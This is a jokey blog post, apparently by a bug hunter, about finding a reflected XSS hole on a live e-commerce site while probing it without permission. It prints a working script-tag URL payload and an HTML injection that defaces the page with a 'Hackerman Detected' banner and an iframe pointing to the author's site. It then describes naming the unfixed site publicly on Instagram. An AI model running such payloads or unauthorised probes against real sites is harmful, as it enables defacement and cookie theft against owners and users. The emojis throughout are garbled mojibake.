β Just Another Day, Just Another XSS
Picture this: I was casually sipping my coffee β and scrolling through an eβcommerce website when I thought, "Let's see if this site has any vulnerabilities." (Because why not? π)
π I started testing different parameters, injecting payloads, and BOOM π₯ β a wild XSS popup appeared!
Me, after seeing the popup:
π΅οΈ Recon & Discovery
Like every good hacker, I started with recon. I played around with the site's parameters, URLs, and input fields. After some trial and error, I found something interesting:
https://example.com/product_grid.php?pkey=<script>alert(1)</script>And guess what? It worked. π―
Noob Developer's Security Implementation.
π Exploitation β Crafting the Payload
Since basic JavaScript injection was working, I took it up a notch and created a cool HTML Injection Payload:
<div style="position:fixed; bottom:20px; left:20px; background:#111;
color:#0f0; padding:15px; font-size:18px; font-family:monospace;
border-radius:10px; box-shadow:0px 0px 10px lime; text-align:center;">
<b>π» Hackerman Detected!</b><br>
Kick off your noob developer, hire a real security researcher! <br>
π <a href="https://www.linkedin.com/in/YOUR_USERNAME"
target="_blank"
style="color:aqua; text-decoration:none; font-weight:bold;">
Contact Me Here
</a> π
</div>
<iframe src="https://aiwolfie.vercel.app"
width="300" height="200"
style="border:2px solid lime; display:block; margin-top:10px;">
</iframe>And just like that, the website was flexing my hacker banner like a pro. π
Me after successfully injecting HTML:
π± The Impact β Why This Is Serious
This XSS vulnerability allows attackers to:
- Steal user cookies πͺ
- Deface the website π΅
- Redirect users to malicious pages π¨
In short, not fixing this could mean disaster for users and the website itself.
Website Owner Seeing This Vulnerability:
π’ Reporting the Bug β No Security.txt, No Contact Info π
Following ethical hacking principles, I wanted to report this issue. But guess what? The website had no security.txt file, no bug bounty program, and no clear way to contact the owner. π€¦ββοΈ
So, I did what any frustrated security researcher would do β posted the bug on my Instagram story and even mentioned the website's page.
Sadly, no response till now. π€·ββοΈ
π Conclusion β Secure Your Website, Folks!
This was a fun bug to find, but it highlights a serious security flaw. Developers, sanitize your inputs, use CSP policies, and always validate user input to prevent XSS. π₯
π Stay safe, keep hacking (ethically), and always secure your coffee β!
β AIwolfie